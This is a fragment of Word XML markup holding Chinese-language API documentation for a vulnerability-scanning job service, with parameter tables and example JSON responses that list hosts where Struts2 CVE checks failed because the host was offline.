              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15E7EC4B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53501CD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436F7E15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2744CFE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="382418F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D60AEE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01226322" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F41BE09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业。必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="303D9554" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BDE9BD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="060CD8F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35EBC050" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>每页数量：默认为50，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3781C78A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4596904E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2AE38B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546811DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>当前页，从0开始，默认为0，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08D0CFD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1B18F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/error_host</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5bcef3c67d761b31e34ec895","jobType":"2","size":2,"page":3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC5A7F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9B9F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042018000035",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-056拒绝服务漏洞(CVE-2018-1327)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机不在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042017002041",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-053远程代码执行漏洞(CVE-2017-12611)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机不在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "vulId": "QT042017002040",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-052远程代码执行漏洞(CVE-2017-9805)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机不在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042013001856",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-016远程命令执行漏洞(CVE-2013-2251)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机不在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 11,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF657B"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300"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2BB4D78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F152775" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09976C14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1119F411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55321142" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53BCA44A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F793B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62EA6503" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E2B4D12" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CCD03C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60165A88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="549BF5A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EC68BBF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E38AA17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE22C9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05D67155" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>漏洞检测项名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6654A9C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71EBC4E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CED9354" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4139ED62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60FAD61D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59024E0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48790DE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="671663AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E2D3DD4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F4F074" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB9446A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A829223" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5186E0F1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A9C430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43D81491" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5399E22E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="670A0E23" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E705C69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77960055" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5097B510" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F397674" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07CD4111" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6845CF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="592F1B5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1CCF7CD8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A823EC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AEE481" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D811A01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A5AEDB4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EF53432" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE0582C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA39368" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25BA9D29" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5DBB9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF2D909" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="527D2328" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="032BE964" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="用户所有漏洞作业查询"/>
      <w:bookmarkEnd w:id="123"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用户所有漏洞作业查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A55D58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FAE5C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D7728" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>jobType 必传，因全局作业与用户作业分属不同库，不传无法分页处理。另外全局作业暂不支持分页查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE10309"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90"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4F48F1D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53E5160" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52C4B94C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
